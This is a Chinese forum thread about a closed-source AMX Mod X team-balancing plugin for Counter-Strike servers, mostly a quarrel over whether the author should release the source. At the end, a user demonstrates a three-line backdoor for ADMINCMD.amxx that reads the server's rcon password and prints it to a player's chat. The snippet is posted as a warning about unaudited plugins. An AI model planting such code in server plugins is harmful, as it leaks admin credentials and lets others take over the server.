搜索
楼主: csersnake

自动调整队伍,防止一边倒

回复: 自动调整队伍,防止一边倒

支持原创 支持源码!~...

其实PTB是最好的平衡插件,不过同中文ID插件有冲突,因为插件比较大型,更改起来工作量很大.所以也希望楼主能提供此插件的源码.

没源码怎么才能说明是原创啊...............

把PTB随便改改就能实现LZ的功能

PTB有40KB,作为一个辅助插件来说,实在是过于庞大。当时我只看过参数介绍后就直接放弃了。而这个插件,也从最初的3KB逐步增加到现在的10KB,越来越臃肿。不过我自己认为代码是比较合理的,不会浪费服务器多少资源,仅仅用到了 <amxmodx>和<cstrike>而已。

那个别阴阳怪气冷嘲热讽甚至为了得到源码而不惜用激将法说昧心话的家伙,我现在是连鄙视都懒得鄙视了。点通正是因为有你们这样一群自己舍不得花点精力开发甚至是修改插件来帮助他人却把白白享受别人的劳动成果视为天经地义的寄生虫,才日渐冷清!

求助的时候你们几个谁搭理人家了?等人家没办法最后有偿征求了,样品一出,你们来劲了,就好像欠你们似的,居然索要的理直气壮义正词严,怎么能无耻到这种地步!禁止玩家换队伍和随机选择队伍能防止一边倒吗?只能让一边倒更加严重!玩家连想主动去平衡实力都办不到!难道你要告诉被虐的玩家们,队伍选择是随机的,你们被虐只能怪自己倒霉?把PTB随便改改就能实现,那人家求助的时候你怎么不随便改改做个出来给他?你说这昧心话不就是想要源码嘛,OK,你也拿出200元,如果你发现实力平衡和人数平衡都是我抄袭或者修改自其他插件的,我十倍赔给你!PTB的源码我连一眼都没看过!!

我就不明白了,如果你是作者你会把别人有偿征求过的作品随意发布源码出来的吗?你不用考虑一下插件征求者的感受?

真是可笑,放出这个样品反而成了罪人了。我只好妄自猜度,很明显那些普通服务器根本不需要源码就可以因为这个插件而受益的,但是习惯于剽窃他人劳动果实的服务器显然会很难受吧?

那些曾经帮助过我或者分享过自己的源码的前辈,如果肯屈尊来找我,我一定会毫不犹豫的奉上这份源码,但是对于那帮寄生虫,免谈!

呵呵……说了句这个插件没必要用,居然把我也骂进去了,我可没下你的插件,也没说过要你的什么源码,你就不该来发你什么所谓的原创插件了,谁用了就是你所谓的寄生虫了。

请不要把水搅浑,我说的寄生虫指的是什么人?

有原码是好事,没有也不是怀事,愿意放是人家的自由,不愿意放也不是罪,你觉得不好,不要用就是了,你觉得有广告,不要用就是了,何必冷言冷语刺激作者放出原码?没有放,还进行语言方面的小刺激,何必呢?写插件是非常辛苦的,改别人的插件都很辛苦了,更何况写插件???想想自己改个插件是多么辛苦,就可以理解作者写插件是多么不简单了,反正我是写不出来,要是知道原码,也能看懂,也能自己简单修改一下,没有原码,听说还有广告,而且偶的是1.5服,版本也不是1.76c,为了服的稳定,怕挂服,还是不敢用了,不用也无所谓,我们的玩家是成熟的玩家,会自觉维护实力平衡,这样就可以了,尊重作者,尊重别人的劳动果实,尊重别人的辛苦,是每个人做人该有的准则,不给就讥讽是不对滴,不给就不给呗,有什么所谓?有本事你去写一个出来,放出原码来,让大家来尊重你,白白享受你的劳动果实.原码是给朋友的,不是给小人的--------总之不放原码不是罪!我用的很大一个插件是很牛的一个高人的的,他为很多人带去了金钱效益,自己却一分钱都没得到,他的也没有原码,而且是1.6的,只有数字显示,没有英文显示,我照样在使用,非常好,感激,听说去某国家留学了,有机会见到他,一定当面谢谢他,还要请他吃饭,当然记的请他给我原码看一看,或者请他帮我改一下内容显示英文,还有改动一下数据,当然还有更多的问题请教,愿意给就给,不愿意给也不记仇,心存感激的看待他,谢谢他!,最后麻烦辛苦楼主作者帮我改一个1.5下使用的,1.71使用的编译好的.amxx文件,不会挂服的,不会老是把所有人换来换去的,只换高手的,3局换一次,可以单独发给我,也可以放到论坛上来公开,都可以的,谢谢,辛苦了!

在此感激Osca Lee

无偿帮忙我解决我的一个大难题,我搞了2天多也找不到问题所在,他一句话帮我解决了,而我请教的很多人,不是不理.,就是回复一句话,把我抛开.

Osca Lee 谢谢你!:burn:

27 的注意你的言语,我有讽刺什么吗?我只问有没有广告,大家都是开服的,就像同行,你会为同行打广告吗?一个理由,没看清楚问题就不要打大嘴巴在这乱哇哇叫,只会用别人的东西不学永远都是寄生虫,进点通你的目的是什么?你没看到你浏览器上面的是什么吗?点通-授人以鱼,亦授人以渔

没有源码真的不敢用,怕有后门儿。。。。。看一般讨论区的贴子,都有人发现后门命令了!

今天我也试了,在ADMINCMD.amxx中很容易就加上后门

new password[64]

get_pcvar_string(rcon_password, password, 63)

client_print(id,print_chat,"%s",password)

游客